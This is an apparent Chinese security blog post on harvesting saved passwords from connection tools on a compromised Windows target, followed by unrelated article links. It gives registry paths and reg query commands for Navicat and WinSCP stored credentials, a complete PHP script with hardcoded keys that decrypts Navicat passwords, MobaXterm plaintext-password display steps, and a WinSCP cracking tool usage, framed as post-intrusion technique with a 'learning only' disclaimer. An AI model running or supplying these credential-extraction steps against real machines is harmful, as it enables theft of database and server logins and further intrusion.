常见连接工具保存密码获取

简介: 之前有发过关于xshell&finalshell密码破解的文章,本文将继续对一些其他常见的连接工具进行讨论,如有错误,欢迎留言指出!

之前有发过关于xshell&finalshell密码破解的文章,本文将继续对一些其他常见的连接工具进行讨论,如有错误,欢迎留言指出!


一、Navicat密码破解:

Navicat针对不同的数据库,它所存放的地点是不一样的:





MySQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers
MariaDB-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers
MicrosoftSQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers 
Oracle-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers
PostgreSQL-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers
SQLite-->:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers


以mysql为例:


reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers"

列出了保存过密码的连接:



查找关键值:host、UserName、pwd



reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v host
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v username
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v pwd

将pwd的值拿去解密即可


如果远程登陆到了目标机器,可以直接导出已保存的连接:


勾选:导出密码


然后会导出为.ncx的文件,打开查看其内容如下:关键字:UserName="xx" Password="xx"


Password是加密的,要做的就是破解这个密码,github上已有大佬写好了破解脚本,copy-->edit-->run即可,修改最后几行代码即可,脚本内容如下:





<?php
class NavicatPassword
{
    protected $version = 0;
    protected $aesKey = 'libcckeylibcckey';
    protected $aesIv = 'libcciv libcciv ';
    protected $blowString = '3DC5CA39';
    protected $blowKey = null;
    protected $blowIv = null;
    public function __construct($version = 12)
{
        $this->version = $version;
        $this->blowKey = sha1('3DC5CA39', true);
        $this->blowIv = hex2bin('d9c7c3c8870d64bd');
    }
    public function encrypt($string)
{
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->encryptEleven($string);
                break;
            case 12:
                $result = $this->encryptTwelve($string);
                break;
            default:
                break;
        }
        return $result;
    }
    protected function encryptEleven($string)
{
        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;
        for ($i = 0; $i < $round; $i++) {
            $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));
            $currentVector = $this->xorBytes($currentVector, $temp);
            $result .= $temp;
        }
        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }
        return strtoupper(bin2hex($result));
    }
    protected function encryptBlock($block)
{
        return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }
    protected function decryptBlock($block)
{
        return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }
    protected function xorBytes($str1, $str2)
{
        $result = '';
        for ($i = 0; $i < strlen($str1); $i++) {
            $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));
        }
        return $result;
    }
    protected function encryptTwelve($string)
{
        $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
        return strtoupper(bin2hex($result));
    }
    public function decrypt($string)
{
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->decryptEleven($string);
                break;
            case 12:
                $result = $this->decryptTwelve($string);
                break;
            default:
                break;
        }
        return $result;
    }
    protected function decryptEleven($upperString)
{
        $string = hex2bin(strtolower($upperString));
        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;
        for ($i = 0; $i < $round; $i++) {
            $encryptedBlock = substr($string, 8 * $i, 8);
            $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);
            $currentVector = $this->xorBytes($currentVector, $encryptedBlock);
            $result .= $temp;
        }
        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }
        return $result;
    }
    protected function decryptTwelve($upperString)
{
        $string = hex2bin(strtolower($upperString));
        return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    }
};
//需要指定版本两种,11或12
//$navicatPassword = new NavicatPassword(11);
$navicatPassword = new NavicatPassword(11);
//解密
//$decode = $navicatPassword->decrypt('15057D7BA390');
$decode = "密码:".$navicatPassword->decrypt('获取到的密码');
echo $decode."\n";
?>


推荐一个在线运行脚本的网站:https://tool.lu/coderunner/

直接将脚本内容复制,修改注释的地方,运行即可获取到密码:



二、MobaXterm密码获取:

设置-->配置


然后点击显示密码即可直接看到明文密码:

个人版测试不行,专业版应该是可以的:



三、winscp密码获取:

1、首先对方的winscp要设置保存密码:


2、Winscp保存密码存储的位置:

默认情况下,Winscp配置会存储在Windows对应的注册表项下(包括了连接的IP、用户名、密码

Hash),注册表项是固定的


HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions


3、获取保存的连接信息:


reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"

查询到保存的连接:



reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.136.144"

指定某个连接,导出其保存的详细信息:


然后利用winscppwd.exe进行破解:


winscppwd.exe <UserName> <HostName> <Password>

破解成功:


如果远程登陆到了目标,可以导出文件进行解密:


导出的文件为.ini后缀,直接用winscppwd.exe对.ini文件进行解密即可:


winscppwd.exe xx.ini

解密成功:


如果管理员自定义了保存密码文件的路径,可以尝试查找winscp.ini文件,将其拖回本地进行解密


密码破解的工具,后台留言winscppwd即可获取


文章和工具仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!


目录
相关文章
|
关系型数据库 MySQL PHP
01-查看Navicat加密的数据库密码
01-查看Navicat加密的数据库密码
|
NoSQL 安全 Java
Spring Boot3整合Redis
Spring Boot3整合Redis
1588 1
|
Web App开发 缓存 JavaScript
【安装指南】nodejs下载、安装与配置详细教程
这篇博文详细介绍了 Node.js 的下载、安装与配置过程,为初学者提供了清晰的指南。读者通过该教程可以轻松完成 Node.js 的安装,了解相关配置和基本操作。文章首先介绍了 Node.js 的背景和应用场景,随后详细说明了下载安装包、安装步骤以及配置环境变量的方法。作者用简洁明了的语言,配以步骤图示,使得读者能够轻松跟随教程完成操作。总的来说,这篇文章为初学者提供了一个友好的入门指南,使他们能够顺利开始使用 Node.js 进行开发。
5874 2
【安装指南】nodejs下载、安装与配置详细教程
|
传感器 Linux
在Linux中使用libmodbus库进行Modbus RTU主从机通信
Modbus RTU是一种常见的工业通信协议,用于在自动化系统中传输数据。libmodbus是一个流行的C库,用于在Linux系统上实现Modbus通信。本文将介绍如何使用libmodbus库在Linux上创建Modbus RTU主从机通信的示例代码。
6842 0
|
8月前
|
数据处理 开发工具 开发者
requirement.txt 管理python包依赖
在 Python 项目中,`requirements.txt` 用于记录依赖库及其版本,便于环境复现。本文介绍了多种生成该文件的方法:基础方法使用 `pip freeze`,进阶方法使用 `pipreqs`,专业方法使用 `poetry` 或 `pipenv`,以及手动维护方式。每种方法适用不同场景,涵盖从简单导出到复杂依赖管理,并提供常见问题的解决方案,帮助开发者高效生成精准的依赖列表,确保项目环境一致性。
2477 4
|
Web App开发 存储 安全
macOS Sequoia 15.3.2 (24D81) Boot ISO 原版可引导镜像下载
2025 年 3 月 12 发布的 **macOS Sequoia 15.3.2** 为安全更新。
2170 1
macOS Sequoia 15.3.2 (24D81) Boot ISO 原版可引导镜像下载
|
11月前
|
存储 缓存 API
Windows 10 on ARM, version 22H2 ARM64 中文版、英文版下载 (2025 年 5 月更新)
Windows 10 on ARM, version 22H2 ARM64 中文版、英文版下载 (2025 年 5 月更新)
12193 1
Windows 10 on ARM, version 22H2 ARM64 中文版、英文版下载 (2025 年 5 月更新)
|
存储 运维 安全
|
存储 Linux Android开发
Volatility3内存取证工具安装及入门在Linux下的安装教程
Volatility 是一个完全开源的工具,用于从内存 (RAM) 样本中提取数字工件。支持Windows,Linux,MaC,Android等多类型操作系统系统的内存取证。针对竞赛这块(CTF、技能大赛等)基本上都是用在Misc方向的取证题上面,很多没有听说过或者不会用这款工具的同学在打比赛的时候就很难受。以前很多赛项都是使用vol2.6都可以完成,但是由于操作系统更新,部分系统2.6已经不支持了,如:Win10 等镜像,而Volatility3是支持这些新版本操作系统的。
3762 0

热门文章

最新文章

下一篇
开通oss服务